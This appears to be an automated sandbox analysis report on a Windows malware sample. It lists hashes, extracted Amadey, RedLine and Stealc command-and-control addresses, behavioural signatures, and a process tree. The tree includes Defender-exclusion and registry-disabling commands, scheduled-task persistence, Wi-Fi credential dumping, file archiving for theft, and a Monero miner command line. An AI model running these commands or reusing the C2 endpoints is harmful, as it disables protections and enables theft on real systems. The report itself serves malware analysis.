Analysis

  • max time kernel
    150s
  • max time network
    87s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-05-2024 15:24

General

  • Target

    c9723e93969f23222dd7f7efb535d090_NEAS.exe

  • Size

    1.8MB

  • MD5

    c9723e93969f23222dd7f7efb535d090

  • SHA1

    5477b16d562d678d9228d3840261b3cd6548694b

  • SHA256

    8285e1267c0f625c1261da0f93c5b1364372593b86d167e2895aceccf020d692

  • SHA512

    0be677a0a382de4fcb6c38d32ce06012abc39c78d0fe9f6d1a84826e5b0aae744b52ccb0a47be2ee736ff6c6413293792f9202c40fc5bd39b5e6b4e62c1e18a1

  • SSDEEP

    49152:ZgoFLCeZjLChW4eaemmcFilPRhwVfDflLSFWx:ZgKLfrzEmRRhwVZLSFW

Malware Config

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 7 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9723e93969f23222dd7f7efb535d090_NEAS.exe
    "C:\Users\Admin\AppData\Local\Temp\c9723e93969f23222dd7f7efb535d090_NEAS.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1372
    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:4420
      • C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        3⤵
          PID:1708
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
              PID:4256
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 868
              4⤵
              • Program crash
              PID:4216
          • C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
            "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
            3⤵
              PID:4584
            • C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
              "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
              3⤵
                PID:4184
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  4⤵
                    PID:4056
                • C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
                  3⤵
                    PID:4124
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:4452
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      4⤵
                        PID:4860
                        • C:\Users\Admin\Pictures\7TwsbrVDC5gizl2VMDgi8aln.exe
                          "C:\Users\Admin\Pictures\7TwsbrVDC5gizl2VMDgi8aln.exe"
                          5⤵
                            PID:4664
                          • C:\Users\Admin\Pictures\sEgCAH10E8jxpZBWjHZyMoBl.exe
                            "C:\Users\Admin\Pictures\sEgCAH10E8jxpZBWjHZyMoBl.exe"
                            5⤵
                              PID:1812
                            • C:\Users\Admin\Pictures\kygXBjtMH2vNHgQB3OVjw7aL.exe
                              "C:\Users\Admin\Pictures\kygXBjtMH2vNHgQB3OVjw7aL.exe"
                              5⤵
                                PID:220
                              • C:\Users\Admin\Pictures\M1YmgJ1YzqJI6FFlblHsWLsT.exe
                                "C:\Users\Admin\Pictures\M1YmgJ1YzqJI6FFlblHsWLsT.exe"
                                5⤵
                                  PID:4732
                                • C:\Users\Admin\Pictures\e3NWLnmcdglmqIV5zqQ0niai.exe
                                  "C:\Users\Admin\Pictures\e3NWLnmcdglmqIV5zqQ0niai.exe"
                                  5⤵
                                    PID:2196
                                  • C:\Users\Admin\Pictures\1uZteJOdkdpxorPKVQQX8GFU.exe
                                    "C:\Users\Admin\Pictures\1uZteJOdkdpxorPKVQQX8GFU.exe"
                                    5⤵
                                      PID:1748
                                    • C:\Users\Admin\Pictures\y66B7J3bFvqVJH4noG8WlqUj.exe
                                      "C:\Users\Admin\Pictures\y66B7J3bFvqVJH4noG8WlqUj.exe"
                                      5⤵
                                        PID:4816
                                        • C:\Users\Admin\AppData\Local\Temp\7zS841A.tmp\Install.exe
                                          .\Install.exe /ThYFdiduvbI "385118" /S
                                          6⤵
                                            PID:4752
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                              7⤵
                                                PID:4052
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                  8⤵
                                                    PID:1832
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      9⤵
                                                        PID:3812
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                          10⤵
                                                            PID:1432
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                        8⤵
                                                          PID:3232
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            9⤵
                                                              PID:4608
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                10⤵
                                                                  PID:440
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                              8⤵
                                                                PID:4980
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  9⤵
                                                                    PID:4212
                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                      10⤵
                                                                        PID:3824
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                    8⤵
                                                                      PID:4512
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        9⤵
                                                                          PID:2792
                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                            10⤵
                                                                              PID:2476
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                          8⤵
                                                                            PID:4596
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              9⤵
                                                                                PID:1228
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                  10⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:4324
                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                    11⤵
                                                                                      PID:2248
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                              7⤵
                                                                                PID:4472
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                  8⤵
                                                                                    PID:2724
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                      9⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:1080
                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                        10⤵
                                                                                          PID:4336
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 15:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS841A.tmp\Install.exe\" it /LNCdidsydF 385118 /S" /V1 /F
                                                                                    7⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:1016
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                    7⤵
                                                                                      PID:3812
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                        8⤵
                                                                                          PID:4124
                                                                                          • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                            9⤵
                                                                                              PID:4368
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
                                                                                  3⤵
                                                                                    PID:4772
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                      4⤵
                                                                                        PID:208
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                      3⤵
                                                                                        PID:5020
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                          4⤵
                                                                                            PID:2000
                                                                                            • C:\Windows\system32\netsh.exe
                                                                                              netsh wlan show profiles
                                                                                              5⤵
                                                                                                PID:4312
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
                                                                                                5⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:3092
                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                                            3⤵
                                                                                              PID:1552
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
                                                                                              3⤵
                                                                                                PID:3532
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                  4⤵
                                                                                                    PID:4584
                                                                                                    • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                                                                                                      5⤵
                                                                                                        PID:3892
                                                                                                      • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                                                                                                        5⤵
                                                                                                          PID:4288
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                                                                                          5⤵
                                                                                                            PID:3816
                                                                                                            • C:\Windows\SysWOW64\choice.exe
                                                                                                              choice /C Y /N /D Y /T 3
                                                                                                              6⤵
                                                                                                                PID:1696
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 360
                                                                                                            4⤵
                                                                                                            • Program crash
                                                                                                            PID:4536
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
                                                                                                          3⤵
                                                                                                            PID:1524
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                                                                                              4⤵
                                                                                                                PID:2312
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  Sc stop GameServerClient
                                                                                                                  5⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:848
                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                  GameService remove GameServerClient confirm
                                                                                                                  5⤵
                                                                                                                    PID:4116
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    Sc delete GameSyncLink
                                                                                                                    5⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:2504
                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                    GameService remove GameSyncLink confirm
                                                                                                                    5⤵
                                                                                                                      PID:1568
                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                      GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                      5⤵
                                                                                                                        PID:2472
                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                        GameService start GameSyncLink
                                                                                                                        5⤵
                                                                                                                          PID:4044
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                                                                                                        4⤵
                                                                                                                          PID:5104
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            Sc stop GameServerClientC
                                                                                                                            5⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:1380
                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                            GameService remove GameServerClientC confirm
                                                                                                                            5⤵
                                                                                                                              PID:4432
                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                              Sc delete PiercingNetLink
                                                                                                                              5⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:3796
                                                                                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                              GameService remove PiercingNetLink confirm
                                                                                                                              5⤵
                                                                                                                                PID:4504
                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                5⤵
                                                                                                                                  PID:4700
                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                  GameService start PiercingNetLink
                                                                                                                                  5⤵
                                                                                                                                    PID:4320
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                                                                                                                  4⤵
                                                                                                                                    PID:2880
                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                      Sc delete GameSyncLinks
                                                                                                                                      5⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:5100
                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                      GameService remove GameSyncLinks confirm
                                                                                                                                      5⤵
                                                                                                                                        PID:4844
                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:3356
                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                          GameService start GameSyncLinks
                                                                                                                                          5⤵
                                                                                                                                            PID:2148
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                                                                          4⤵
                                                                                                                                            PID:4564
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
                                                                                                                                          3⤵
                                                                                                                                            PID:2548
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
                                                                                                                                              4⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:1560
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe"
                                                                                                                                              4⤵
                                                                                                                                                PID:4988
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:4468
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5012
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:4744
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1708 -ip 1708
                                                                                                                                                1⤵
                                                                                                                                                  PID:4552
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:8
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4404
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4692
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4880
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3532 -ip 3532
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4604
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:3852
                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1684
                                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3892
                                                                                                                                                                  • C:\Windows\Temp\475114.exe
                                                                                                                                                                    "C:\Windows\Temp\475114.exe" --list-devices
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4320
                                                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3152
                                                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3644
                                                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1092
                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                                          "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1864
                                                                                                                                                                            • C:\Windows\Temp\19901.exe
                                                                                                                                                                              "C:\Windows\Temp\19901.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4896
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS841A.tmp\Install.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7zS841A.tmp\Install.exe it /LNCdidsydF 385118 /S
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:3252
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2076
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2720
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4716
                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
